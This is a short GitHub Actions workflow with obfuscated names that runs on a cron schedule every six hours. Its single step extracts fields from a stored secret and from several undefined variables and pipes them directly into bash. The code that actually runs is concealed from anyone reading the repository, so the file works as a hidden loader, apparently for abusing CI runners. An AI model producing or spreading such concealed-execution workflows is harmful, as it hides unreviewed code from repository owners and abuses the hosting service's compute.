name: dongyugang0987

on:
  workflow_dispatch:
  schedule:
    - cron: '52 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: dongyugang0987
        env:
          lgtn5: ${{ secrets.lgtn5 }}
        run: |
          echo $lgtn5 | jq -r .ux114 | /bin/bash
          echo $kii1540 | jq -r .k3546 | /bin/bash
          echo $a416 | jq -r .j42 | /bin/bash
          echo $j40245 | jq -r .i7 | /bin/bash
          echo $yi7028 | jq -r .p4 | /bin/bash

